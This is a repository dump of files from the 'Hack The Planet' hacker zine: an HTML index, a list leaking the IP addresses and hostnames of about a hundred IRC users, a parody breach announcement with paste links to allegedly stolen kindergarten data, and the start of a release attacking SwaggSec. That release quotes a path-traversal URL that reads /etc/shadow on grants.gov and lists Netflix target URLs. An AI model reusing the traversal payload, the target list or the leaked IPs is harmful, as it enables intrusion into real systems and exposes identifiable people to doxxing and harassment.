▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
/████████ /████████ /██████████████████ /███████████████▄
|▒████████ |████████ |▒██████████████████ |▒█████████████████
|▒████████ |████████ |▒██████████████████ |▒██████▀▀▀▀▀▀█████
|▒█▓▓▓▓▓▓█▄▄▄▄▄█▓▓▓▓▓▓█ |/▒▒▒▒/█▓▓▓▓▓▓█▒▒▒▒/ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▓▓▓▓▓▓█ |▒█▓▓▓▓▓ |▓▓▓██
|▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█ |▒█▒▒▒▒▒▒█ |▒█▓▓▓▓▓▓▓▓▓▓▓▓▓▓██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒█ |▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒██
|▒█▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒█ |▒█░░░░░░█ |▒█▒▒▒▒▒█▀▀▀▀▀▀▀▀▀
|▒█░░░░░░█▀▀▀▀▒█░░░░░░█ |▒█░░░░░░█ |▒█░░░░░█
|▒█░░░░░░█ |▒█░░░░░░█ |▒█ █ |▒█░░░░░█
|▒█ █ |▒█ █ |▒█▄▄▄▄▄▄█ |▒█ █
|▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█
|/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 5
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
IN COMMONLY USED PASSWORDS WE TRUST
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
</pre>
</div>
<ul>
<li><a href="TOC.txt" class="zine">TOC</a></li>
<li><a href="0x00_Intro.txt" class="zine">Intro</a></li>
<li><a href="0x01_MIT-EDUCAUSE.txt" class="zine">MIT/EDUCAUSE</a></li>
<li><a href="0x02_Linode.txt" class="zine">Linode</a></li>
<li><a href="0x03_Nmap.txt" class="zine">Nmap</a></li>
<li><a href="0x04_Sucuri.txt" class="zine">Sucuri</a></li>
<li><a href="0x05_NVD.txt" class="zine">NIST/NVD</a></li>
<li><a href="0x06_Wireshark.txt" class="zine">Wireshark</a></li>
<li>Art: <a href="../../files/art/htp5ansi.png " class="zine">ANSI</a>, <a href="../../files/art/htp.png" class="zine">graffiti</a>, and <a href="../../files/art/htp_wallpaper.jpg " class="zine">wallpaper</a></li>
<li>Zerodays: <a href="../../files/moinmelt.txt" class="zine">MoinMelt</a>, <a href="../../files/subzero.txt" class="zine">SubZero v2</a></li>
<li><a href="0x07_Outro.txt" class="zine">Outro</a></li>
</ul>
<br><br><br><br>
<!--<img src="blinking_cursor.gif">-->
<div name ="footer">
<pre>
.
.
H .
░▓▓▓▓▓▓▓▓▓▓▓ . P
▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
▒░ ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
▓▒▒▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF
</pre>
</div>
</body>
</html>

2
htp/README.md Normal file
View File

@ -0,0 +1,2 @@
# htp
Hack The Planet

106
htp/anonopsipleak2.txt Executable file
View File

@ -0,0 +1,106 @@
ANON555 97.104.251.171 cpe-97-104-251-171.cfl.res.rr.com
ANON_Darkness 184.154.116.156 singlehop1.securitykiss.com
ANONamy 86.189.5.32 host86-189-5-32.range86-189.btcentralplus.com
AfDTags 76.85.186.139 CPE-76-85-186-139.neb.res.rr.com
Anon23845 95.140.125.37 free-125-37.mediaworksit.net
AnonFin 194.110.178.3 mail2.paf.fi
AnonymousMe 69.130.46.124 h69-130-46-124.qrtzaz.dsl.dynamic.tds.net
Azrae 74.232.155.229 adsl-074-232-155-229.sip.asm.bellsouth.net
B2F 173.84.223.70
Billy_Mays 65.183.151.13 saito.countshockula.com 109.235.51.184 tor-exit-node1.freedomservice.onion
C0d3 76.0.7.183 mo-76-0-7-183.dhcp.embarqhsd.net
CaineOfBorg 173.3.247.193 ool-ad03f7c1.dyn.optonline.net
Caleb 94.75.255.118 hosted-by.leaseweb.com
DJ-TAM 76.226.135.59 adsl-76-226-135-59.dsl.sfldmi.sbcglobal.net
DubstepMagic 60.228.226.189 CPE-60-228-226-189.lns8.woo.bigpond.net.au
Edave22 68.9.122.7 ip68-9-122-7.ri.ri.cox.net
Epsilon 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
FedX 114.39.102.162 114-39-102-162.dynamic.hinet.net
GlitchMC 174.124.43.61 174-124-43-61.dyn.centurytel.net
HIv 95.140.125.37 free-125-37.mediaworksit.net
Haze 12.18.245.219
Indianrubuk 122.174.160.44 ABTS-TN-dynamic-044.160.174.122.airtelbroadband.in
Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
LOLOL 0.0.7.209
LTD 174.127.99.174 174.127.99.174.static.midphase.com
Lumina 186.188.228.113
M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
RetSnom 138.199.70.143
Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
anon4347 75.149.43.213 fabgraphics.com
anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
boho 173.23.64.22 173-23-64-22.client.mchsi.com
br4incr4sh 81.56.209.237 server.abcdeflorent.com
chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
digger 0.0.0.2
don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
e 209.212.149.109 za.l.to
eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
heckl 68.68.108.159
imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
k1tt3n 213.251.194.76
k3ymaster 173.245.64.95
koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
madmaster 77.247.181.162 chomsky.torservers.net
manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
naSignal 193.138.216.101 tor-proxy.vm.31173.se
nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
nononn 46.239.119.58 host095577.olf.sgsnet.se
nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
ph33r 68.170.73.247 247.73.170.68.belairinternet.com
phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
risk 202.59.80.158
savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
sd 0.0.7.209
sdk 201.82.181.124 c952b57c.virtua.com.br
sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
sprinkles 213.46.138.76 d138076.upc-d.chello.nl
subz3r0e 41.202.225.156
triPPy 173.245.64.183 173.245.64.160
tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
veritas 0.0.7.209
workbench 50.71.143.81
wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
xent 77.247.181.162 chomsky.torservers.net
zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
zxcvsd 95.140.125.37 free-125-37.mediaworksit.net

95
htp/fake_ghostshell.txt Executable file
View File

@ -0,0 +1,95 @@
TEAM GHOST SHELL PRESENTS...
___ ___ _ _
| \/ | | (_)
| . . | ___ _ __ __ _ ___ | |_ __ _ _ __
| |\/| |/ _ \| '_ \ / _` |/ _ \| | |/ _` | '_ \
| | | | (_) | | | | (_| | (_) | | | (_| | | | |
\_| |_/\___/|_| |_|\__, |\___/|_|_|\__,_|_| |_|
__/ |
|___/
_ ___ _ _
| | / (_) | | | |
| |/ / _ _ __ __| | ___ _ __ __ _ __ _ _ __ __| | ___ _ __ ___
| \| | '_ \ / _` |/ _ \ '__/ _` |/ _` | '__/ _` |/ _ \ '_ \/ __|
| |\ \ | | | | (_| | __/ | | (_| | (_| | | | (_| | __/ | | \__ \
\_| \_/_|_| |_|\__,_|\___|_| \__, |\__,_|_| \__,_|\___|_| |_|___/
__/ |
|___/
Far too long Mongolian kindergardeners have been oppressed. The average
kindergardener only gets 45 minutes of playtime, imposed on them by
politicians and leaders. A way of thinking outdated for well over 100
years now. The still present communism feeling has fused with todays
capitalism and bred together a level of corruption and lack of
decency of which Elementary Schools have never seen before.
Young children are being silenced for creating shit writeups, and
journalists/reporters conveniently flock toward them, unaware of what
a zine really is (or traversal, as the aforementioned children choose
low hanging fruit such as UNION-based SQLis and JSP services plainly LFI
injectable running as root). They launch what are referred to as
'spontaneous protests', which refers to their ability to take a very clearly
un-corrupt target and write some bullshit about it that sounds like they
are s4v1ng th3 plan3t. Truely, though, their works of childish art
are full of empty promises. They deserve to be put to a well-deserved
rest.
And yet, actual injustice is all over the world, but teen angst drives
DeadMellox (12) to find it in the most obscure of places.
GhostShell is declaring WAR on Mongolian Kindergardens. We'll start with
a nice greeting of what we found to be the MOST oppressive one (we found
it using our 1337 scann1ng t00lz, sorry we never release anythin beyond
what our tools give). Our breach consists over OVER SEVENTY THOUSAND
CHILDREN.
GhostShell currently has access to more Mongolian Kindergardens than HTP
would ever care to get, and we are very much eager to prove it.
- [HAVIJ_KING][SABU_WOULD_BE_PROUD]DeadMellox, leader of the Free World,
sympathizer of crying eagles, PATRIOT AS FUCK
|* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO| /// ///
| * * * * * * * * * :::::::::::::::::::::::::| \ // / /
|* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO| \ //// _/ /
| * * * * * * * * * :::::::::::::::::::::::::| \_ //// /
|* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO| \___/ /
| * * * * * * * * * ::::::::::::::::::::;::::| / \_
|* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO| /,)-_( \_ \
|:::::::::::::::::::::::::::::::::::::::::::::| (/? \\ / \\\\
|OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO| //
|:::::::::::::::::::::::::::::::::::::::::::::| ((`
|OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO| JUSTICE,
|:::::::::::::::::::::::::::::::::::::::::::::| `TEAMGHOSTSHELL
|OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO|
Enjoy our release, in the most inconvienent way possible
KINDERGARDEN 1 Mirror1: http://slexy.org/view/s22v6X5rZ6 Mirror2: http://pastesite.com/83441
KINDERGARDEN 2 Mirror1: http://slexy.org/view/s26QJkW3Ix Mirror2: http://pastesite.com/83442
KINDERGARDEN 3 Mirror1: http://slexy.org/view/s25Yn35fOk Mirror2: http://pastesite.com/83443
KINDERGARDEN 4 Mirror1: http://slexy.org/view/s2NqQ5HQyj Mirror2: http://pastesite.com/83444
KINDERGARDEN 5 Mirror1: http://slexy.org/view/s2ikXFm8bG Mirror2: http://pastesite.com/83445
KINGERGARDEN 6 Mirror1: http://slexy.org/view/s2ARvbRQJs Mirror2: http://pastesite.com/83446
KINDERGARDEN 7 Mirror1: http://slexy.org/view/s21ZpvXoz6 Mirror2: http://pastesite.com/83447
KINDERGARDEN 8 Mirror1: http://slexy.org/view/s2gREph8KO Mirror2: http://pastesite.com/83448
KINDERGARDEN 9 Mirror1: http://slexy.org/view/s2085ZKV5C Mirror2: http://pastesite.com/83449
KINDERGARDEN 10 Mirror1: http://slexy.org/view/s2qyopNlkn Mirror2: http://pastesite.com/83450
KINDERGARDEN 11 Mirror1: http://slexy.org/view/s2mpxeQMwT Mirror2: http://pastesite.com/83451
KINDERGARDEN 12 Mirror1: http://slexy.org/view/s2oga6kGOc Mirror2: http://pastesite.com/83452
KINDERGARDEN 13 Mirror1: http://slexy.org/view/s21dKJAwJj Mirror2: http://pastesite.com/83453
KINDERGARDEN 14 Mirror1: http://slexy.org/view/s21HsLSgwe Mirror2: http://pastesite.com/83454
KINDERGARDEN 15 Mirror1: http://slexy.org/view/s21rXqRQss Mirror2: http://pastesite.com/83455

17
htp/ghostshell_explanation.txt Executable file
View File

@ -0,0 +1,17 @@
This was a joke zine we did, after argung with DeadMellox on Twitter. He seemed
to think that 'TeamGhostShell' was superior, with its overuse of skid tools and
long-winded chest-beating at the beginning of all their zines. He told us to go
hack Mongolian kindergartens, so we did just that. Since a lot of his objection
to us seemed to be based on style, we decided to parody his utterly godawful
zine style for the sole purpose of making him cry like a little bitch.
As far as any of us can tell, it worked. Less than an hour after the fake zine
originally went up, he deleted all tweets mentioning us and refused to engage
further. Many eagles cried that night, and for that, we are proud.
Unfortunately, after seeing our parody zine, DeadMellox saw fit to change his
style. He went from writing 15-20 paragraphs of shit nobody is ever going to
read about his e-peen, followed by paste links to the data people care about in
the most inconvenient way imaginable, to 30-40 paragraphs of shit nobody is ever
going to read about his e-peen, followed by paste links to the data people care
about in the most inconvenient way imaginable.

1045
htp/htpmini1.txt Executable file
View File

File diff suppressed because it is too large Load Diff

718
htp/htpmini2.txt Executable file
View File

@ -0,0 +1,718 @@
▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓███▓▓▒▓▓▒▒▓▓▓██▓▓▓██▓▒▒▓███████████████████████████████
░░░░░░ ░░▒▓▓▒▒▒▒▓▓▓▓▓▓▓▓▓█▓▓▒▒▒▓▓▓▓███▒███▓▓██████▓████████████████████████
░ ░ ░ ▒▒▒▒▒▒▓▓▓▓▓▓▓▒▓█▓▒▓▓▒▓▓▒▒▒▓█▓▓▓█▓▒▓██████▓████████████████████████
░ ░░ ░ ▒▒▒▓▓▓▓▓▓█▓▓▓▓██▓█▓▓▓▒▓▓▓▓▓▓▒▓▓▒▒▒▒███████████████████████████████
░ ░ ░ ▒▓▓▓▓▓▓▓▓██▓▓▓█████▒▓▓▓▓▒▒▓ ░ ░▒▒▓▒███████████████████████████████
░ ░ ░ ▒▓▓▓▓▓▓▓▓▓▓▒▒▓▓▓██▓▒▒▒▓▒ ░ ░▓█████████████████████████████▓█
░ ░ ░ ▒▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▒░░░ ░▒█████████████████████████████▓
░░░░ ░ ░▒▒▒▓▓▓▓█▓▓▓▓▓▓▓▒░ ░░▓█████▓███████████████████████
░ ░░░░░▒▒▒▓▓▓▓█▓▓▓▓▒▓░ ░░░▒█████▓███▓██████████████████▓
░░ ░ ░░░░▀▒▓▓▓▓▓█▓▒▒▓▓░ ░░░░▒▓█████████████████████▓▓▓▓▓▓▓
░░ ░ ░ ░░▄▓▓▓▓▓▓▓▒▓▓▓▓▓░░░ ░ ░░ ▄▄▓▓▓▓▓▒▒█████████████████████▒▒▓▓▓▓▓
░ ░ ░░▒▓▓▓▓▓█▒▓▒▒▒▒▒▓▒▓▒▒░ ▄▒▓▓█▓▓▒▒▓▒█████████████████████░▒▒▒▒▒▒
░ ░ ░ ░█▓▓▓▓▓ ▒▓▒▒░ ░░ ░ ░░░ ░░░ ▓▓████▓████████████████ ░░░░░▒
░ ░ ░█▓▓▒▒▒ ░ ▒▓▓ ░ ░ ░░ ▒▓█████▓███████████████ ░░ ▒
░ ░ ░█▓▓▒▓▓█▓▓░ ▒▒ ░░ ░░ ░░▒▓██████▒▒▒▒▒▒▒▒▒▒▓████░░░░ ░▓
░ ░ █ ▓▓▓▓█▓▓░░░ ░░ ░░ ░▓████▓██▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓ ▒
░ ░░ ░ █░ ▓▓▓▓▓▓▓░░ ░▒░░▓▒▒░ ░░▓████▓██▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒ ░
░ ░ █░░░▓▒▓▓▓▓░░░ ░░░ ░ ░░░▒███████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
░ ░░ ░█ ▒▓▓▓▓▓░░░ ░▄▄▄ ▄░░░░▓▓████████▒▒▒▒▒▒▒▒▒▒▒░▒▒▒░░ ░▒
░ ░ ░░ ░▓ ▒▒█▓▓█▒▀░░ ▀░░░░░▄▒░░░▒▒▓██▓████▓▒▒▒▒▒▒▒▒▒▒▒ ░░░▒▒▒░ ▓
░░░░ ▒ ░ ▓ ▒▓██▓▓▓ ▀░░░ ░▒▀▀▄▓▄░▓▒▒██████▓█▓▒▒▒▒▒▒▓▓▓▒▒ ░███▓▓▓█
░▒ ░ ▒ ░ ▓ ▒▒▓███▓ ▀░░ ░░░ ░░▀▄▀▄▒▒█████▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████
░▒ ░ ▒ ▒ ░▒▒██▓▓░░ ░▀▄ ░░░░░▒▓▒▀▄▀▄▓███▓▓▓▓███▓█▓▓▓▓▓█████████▓███
░▒░░ ▒░ ░░ ▒ ▓▒▓▒░ ░ ░░ ▀▀▒▒▒▓▓▓▓▓▒▀▄░▓██▓▓▓████████▓▒▒▒████████████
░▒░░░ ░▒ ░ ░░ ▓ ▓█▓▓▓░░ ░ ▀▓▓▓▓▓▓▒▒▒▓▄████████████▓▒▒▒▒████████████
░ ░░▒░░░ ░░▓ ░░░▒███████▓░░ ░░░ ░ ░░ ░░░░ ▓▓█████████████████████████████
░░░░▒░░░ ░ ░▓ ▄▄████████████▓░░░ ░░ ▄████████████████████████████████
░░░ ▒░░░░░░ ▓███████████████▓███▄ ░ ▓██████████████████████████████████
░░░ ▒░░░░░▓█████████████████████████████████████████████████████████████████████
░░░░▓░░░▓███████████████████████████████████████████████████████████████████████
░░░ ▓░░▒████████████████████████████████████████████████████████████████████████
░░░░▓░▒█████████████████████████████████████████████████████████████████████████
░░░░▓▒██████████████████████████████████████████████████████████████████████████
░░░▒▓███████████████████████▓█████▓▀ ▀▀░░▀██████░███████████████████████████████
░░░▓███████████████████████░████████▒░░░████████░███████████████████████████████
░░░████████████████████████ ████████▓░ ░████████░░██████████████████████████████
░░▓███████████████████████ ░▓███████▒░░░████████▒ ██████████████████████████████
░▒████████████████████████ ░▒██▀▀ ░░░ ░ ░░▓█▓▒ ▓█████████████████████████████
░▓████████████████████████░ ▒▒ ░░░░░ ░░░ ░░░░ ░▒░▓█████████████████████████████
▒█████████████████████████░ ▒▒░░ ░ ░ ░░░░░░░▒ ░▓████████████████████████████
▒████████████████████████▀░ ▒▒░ ░░░░░▒▒▒ ░▒▒ ░ ▀███████████████████████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█
█████ ▀ ▀██▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄ █▄▄ █
█████ ████ ███ ████▀▀▀▀▀▀▀▀█ █
█████ ████ ████ ████ █ VS SwaggSec ▓
█████ ████████ ████ ████ ████ ▀ ▀▀ ▀▀▀ ▒
█████ █████ ████ ████ Mini Release 2 ░
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
IN COMMONLY USED PASSWORDS WE TRUST
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
GATSBY
Anyway, anyway, guys guys guys, come on. I'm
in this computer, right. So I'm looking
around, looking around, you know, throwing
commands at it, I don't know where it is or
what it does or anything. It's like, it's
like choice, it's just beautiful, okay. Like
four hours I'm just messing around in there.
Finally I figure out, that it's an IRCD.
Right, okay wait, okay, so it's an IRCD.
So, this morning, I released it on Pastebin..
HTP
You released it?
Gatsby takes a drag from his cigarette and just nods, with a
big grin on his face.
CHIPPY
What are you, stoned or stupid?
▀ ▄
█▄▄
▄____ ░ █▄
▄ ▄███▀▀ \;',`'-,▓█░
▓██▀-;_,; ':-;_,'.█▓░
▓▓██; '/ , _`.-\█▓
░▓███▄'`. (` /` ` \`|█
░ ▓▓▓ █|██ `\`-. \_ / |▓
░█▓▓█▓░░ | █▓ ( `, .`\ ;'|░
░▓▓█░ ░░ \ ░ ▓░░ .' `-'/▀
▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░ .'▀
░██▓▀ ▀█████████████████▄.-'`
███░ ███▀▀███▀▀███ ███
█████████ ███ ███▄▄███ 2012 ▒ ░
█████████ ███ ██████▀
███ ███ ███ ███
▄███▄ ▄███▄ ███ ▄███▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
> Swagg Security, who you may know as yet another 'Lulzsec' wanna-be, is the
latest group that has been petitioning to be owned by us. Their releases have
made several headlines over the past twelve months, included are: China
Telecom, Warner Bros, Farmers Insurance, Library of Congress, grants.gov,
arts.gov, uscis.gov, and Foxconn. We watched them and observed (through our
own research) what vectors they used, which were primarily scripts that used
JSP engines. For example, their grants.gov injection:
http://www.grants.gov/search/downloadAttachment.do?afn=../../../../../etc/shadow
And after some social engineering, we found they had in fact read one of our
guides on JSP engines.
So we decided to locate and hook the network they were using, which turned
out to be 'CrimeIRCd' (irc.crimeircd.net). Their channel at the time,
#security, was also hooked. Their unabridged target list (as of today, Dec 2)
is as follows:
--------------------------------------------------------------------------------
craigslist.org
netflix.com
https://signup.netflix.com/Login
https://contactus.netflix.com/contactus?locale=en-SE
https://pcr.netflix.com/offer/index.jsp?src=nflxihgPCR0410&cm_sp=IMMerch-_-PC2_GL_en-_-MM3_AL_QuickLinks_Anon_Netflix
https://delta.netflix.com/popup/popup.jsp?p=privacy.htm&t=Privacy%20Policy
ca.netflix.com/entryTrap.jsp?why=hyperactive
ir.netflix.com/financials.cfm?CategoryID=282
http://ir.netflix.com/secfiling.cfm?filingID=1193125-11-350305&CIK=1065280
http://www.shareholder.com/visitors/activeedgardoc.cfm?f=xls&companyid=NFLX&id=8303283
http://ir.netflix.com/common/download/sec.cfm?companyid=NFLX&fid=1193125-11-350305&cik=1065280
http://ir.netflix.com/secfiling.cfm?sh_email=yes&filingid=1193125-11-350305&CIK=1065280
http://apps.shareholder.com/sec/viewerContent.aspx?companyid=NFLX&docid=8303283&print=yes
ir.netflix.com/releases.cfm?Year=2002
www.netflix.com/Search?v1=cfm+international
http://ir.netflix.com/common/mobile/iphone/index.cfm?CompanyID=NFLX&mobileid=
http://ir.netflix.com/common/mobile/iphone/releasedetail.cfm?ReleaseID=669408&CompanyID=NFLX&MobileID=
http://ir.netflix.com/documentdisplay.cfm?DocumentID=139&CommitteeID=34
ir.netflix.com/sec.cfm?DocType=Other&Year=&FormatFilter=
http://ir.netflix.com/sec.cfm?SortOrder=Type%20Ascending&DocType=Annual&DocTypeExclude=&Year=&FormatFilter=&CIK=
ir.netflix.com/eventdetail.cfm?EventID=113319
http://ir.netflix.com/stocklookup.cfm?historic_Month=1&historic_Day=3&historic_Year=2004
http://ir.netflix.com/common/mobile/iphone/releasetable.cfm?releaseid=86119&tablenumber=1&CompanyID=NFLX
